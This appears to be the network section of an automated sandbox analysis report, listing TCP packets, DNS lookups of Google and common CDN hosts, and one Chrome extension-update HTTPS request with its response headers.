                                                                                                                                                                                Oct 25, 2021 18:17:37.357966900 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.357991934 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.358012915 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.358036041 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.358146906 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.358167887 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.358187914 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.358207941 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.358227015 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.358252048 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.358273029 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.358292103 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.358478069 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.358498096 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.358515024 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.358540058 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.358561039 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.358581066 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.358601093 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.358622074 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.358642101 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.358661890 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359025002 CEST60983443192.168.2.3172.217.168.33
                                                                                                                                                                                Oct 25, 2021 18:17:37.359157085 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359183073 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359206915 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359227896 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359255075 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359280109 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359297037 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359321117 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359343052 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359366894 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359390020 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359411001 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359433889 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359453917 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359474897 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359498024 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359519958 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359541893 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359564066 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359586000 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359607935 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359632969 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359653950 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359674931 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.359972954 CEST60983443192.168.2.3172.217.168.33
                                                                                                                                                                                Oct 25, 2021 18:17:37.360156059 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.360181093 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.360202074 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.360224009 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.360248089 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.360271931 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.360294104 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.360316992 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.360337019 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.360357046 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.360378027 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.360399961 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.360424995 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.360446930 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.360467911 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.360488892 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.360511065 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.360532045 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.360553026 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.360574961 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.360599995 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.360621929 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.360829115 CEST60983443192.168.2.3172.217.168.33
                                                                                                                                                                                Oct 25, 2021 18:17:37.361188889 CEST60983443192.168.2.3172.217.168.33
                                                                                                                                                                                Oct 25, 2021 18:17:37.361469984 CEST60983443192.168.2.3172.217.168.33
                                                                                                                                                                                Oct 25, 2021 18:17:37.361773968 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.361803055 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.361825943 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.361849070 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.361866951 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.361887932 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.361911058 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.361932039 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.361953974 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.361974955 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.361994028 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.362015009 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.362036943 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.362061977 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.362083912 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.362103939 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.362124920 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.362147093 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.362166882 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.362293005 CEST60983443192.168.2.3172.217.168.33
                                                                                                                                                                                Oct 25, 2021 18:17:37.362690926 CEST60983443192.168.2.3172.217.168.33
                                                                                                                                                                                Oct 25, 2021 18:17:37.362993956 CEST60983443192.168.2.3172.217.168.33
                                                                                                                                                                                Oct 25, 2021 18:17:37.363289118 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363317966 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363356113 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363379002 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363401890 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363424063 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363445044 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363467932 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363490105 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363512993 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363533974 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363554955 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363575935 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363600016 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363621950 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363642931 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363663912 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363686085 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363711119 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363733053 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363754034 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363776922 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363800049 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363821030 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363842964 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363864899 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.363883972 CEST60983443192.168.2.3172.217.168.33
                                                                                                                                                                                Oct 25, 2021 18:17:37.364221096 CEST60983443192.168.2.3172.217.168.33
                                                                                                                                                                                Oct 25, 2021 18:17:37.364537001 CEST60983443192.168.2.3172.217.168.33
                                                                                                                                                                                Oct 25, 2021 18:17:37.364698887 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.364726067 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.364778996 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.364803076 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.364825010 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.364844084 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.364867926 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.364888906 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.364907980 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.364927053 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.364948988 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.364970922 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.364991903 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.365012884 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.365037918 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.365060091 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.365078926 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.365101099 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.365123034 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.365144968 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.365165949 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.365187883 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.365211964 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.365235090 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.365458965 CEST60983443192.168.2.3172.217.168.33
                                                                                                                                                                                Oct 25, 2021 18:17:37.365842104 CEST60983443192.168.2.3172.217.168.33
                                                                                                                                                                                Oct 25, 2021 18:17:37.367213011 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.367290020 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.367331028 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.367364883 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.367396116 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.367428064 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.367461920 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.367487907 CEST60983443192.168.2.3172.217.168.33
                                                                                                                                                                                Oct 25, 2021 18:17:37.367497921 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.367537975 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.367574930 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.367608070 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.367640018 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.367671967 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.367703915 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.367737055 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.367768049 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.367799044 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.367820024 CEST60983443192.168.2.3172.217.168.33
                                                                                                                                                                                Oct 25, 2021 18:17:37.367832899 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.367867947 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.367899895 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.367933035 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.368767023 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.368792057 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:37.368968964 CEST60983443192.168.2.3172.217.168.33
                                                                                                                                                                                Oct 25, 2021 18:17:37.374805927 CEST60983443192.168.2.3172.217.168.33
                                                                                                                                                                                Oct 25, 2021 18:17:37.399069071 CEST44360983172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:52.251600027 CEST60983443192.168.2.3172.217.168.33
                                                                                                                                                                                Oct 25, 2021 18:17:52.272660017 CEST44360983172.217.168.33192.168.2.3

                                                                                                                                                                                DNS Queries

                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                Oct 25, 2021 18:17:21.570163012 CEST192.168.2.38.8.8.80xa93Standard query (0)clients2.google.comA (IP address)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:21.573842049 CEST192.168.2.38.8.8.80xd1e2Standard query (0)accounts.google.comA (IP address)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:21.579152107 CEST192.168.2.38.8.8.80x9843Standard query (0)00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.comA (IP address)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:22.821840048 CEST192.168.2.38.8.8.80x97d2Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:22.823765993 CEST192.168.2.38.8.8.80x2c46Standard query (0)kit.fontawesome.comA (IP address)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:22.824618101 CEST192.168.2.38.8.8.80xd5cdStandard query (0)code.jquery.comA (IP address)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:22.836112022 CEST192.168.2.38.8.8.80x3d5eStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:23.184401035 CEST192.168.2.38.8.8.80xcdb6Standard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:23.441365004 CEST192.168.2.38.8.8.80x7b42Standard query (0)ka-f.fontawesome.comA (IP address)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:37.115788937 CEST192.168.2.38.8.8.80xf742Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)

                                                                                                                                                                                DNS Answers

                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                Oct 25, 2021 18:17:21.586275101 CEST8.8.8.8192.168.2.30xa93No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:21.586275101 CEST8.8.8.8192.168.2.30xa93No error (0)clients.l.google.com142.250.181.238A (IP address)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:21.592181921 CEST8.8.8.8192.168.2.30xd1e2No error (0)accounts.google.com142.250.203.109A (IP address)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:21.605803013 CEST8.8.8.8192.168.2.30x9843No error (0)00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:21.605803013 CEST8.8.8.8192.168.2.30x9843No error (0)googlehosted.l.googleusercontent.com172.217.168.33A (IP address)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:22.842386007 CEST8.8.8.8192.168.2.30xd5cdNo error (0)code.jquery.comcds.s5x3j6q5.hwcdn.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:22.843285084 CEST8.8.8.8192.168.2.30x97d2No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:22.843285084 CEST8.8.8.8192.168.2.30x97d2No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:22.844439983 CEST8.8.8.8192.168.2.30x2c46No error (0)kit.fontawesome.comkit.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:22.865195036 CEST8.8.8.8192.168.2.30x3d5eNo error (0)cdnjs.cloudflare.com104.16.19.94A (IP address)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:22.865195036 CEST8.8.8.8192.168.2.30x3d5eNo error (0)cdnjs.cloudflare.com104.16.18.94A (IP address)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:23.204210043 CEST8.8.8.8192.168.2.30xcdb6No error (0)stackpath.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:23.204210043 CEST8.8.8.8192.168.2.30xcdb6No error (0)stackpath.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:23.397598028 CEST8.8.8.8192.168.2.30xddf8No error (0)gstaticadssl.l.google.com216.58.215.227A (IP address)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:23.464509010 CEST8.8.8.8192.168.2.30x7b42No error (0)ka-f.fontawesome.comka-f.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:37.134380102 CEST8.8.8.8192.168.2.30xf742No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                Oct 25, 2021 18:17:37.134380102 CEST8.8.8.8192.168.2.30xf742No error (0)googlehosted.l.googleusercontent.com172.217.168.33A (IP address)IN (0x0001)

                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                • clients2.google.com
                                                                                                                                                                                • 00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com
                                                                                                                                                                                • accounts.google.com
                                                                                                                                                                                • https:
                                                                                                                                                                                  • cdnjs.cloudflare.com
                                                                                                                                                                                  • maxcdn.bootstrapcdn.com
                                                                                                                                                                                  • stackpath.bootstrapcdn.com

                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                0192.168.2.349744142.250.181.238443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-10-25 16:17:22 UTC0OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                                                                                                                                                Host: clients2.google.com
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                X-Goog-Update-Interactivity: fg
                                                                                                                                                                                X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfm
                                                                                                                                                                                X-Goog-Update-Updater: chromecrx-85.0.4183.121
                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                2021-10-25 16:17:22 UTC2INHTTP/1.1 200 OK
                                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-0E9my5ilSy5xb9aCQ4TZkw' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                Date: Mon, 25 Oct 2021 16:17:22 GMT
                                                                                                                                                                                Content-Type: text/xml; charset=UTF-8
                                                                                                                                                                                X-Daynum: 5411
                                                                                                                                                                                X-Daystart: 33442
                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                Server: GSE
                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000
                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                2021-10-25 16:17:22 UTC3INData Raw: 35 31 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 34 31 31 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 33 33 34 34 32 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                                                                                                                                                Data Ascii: 51e<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5411" elapsed_seconds="33442"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
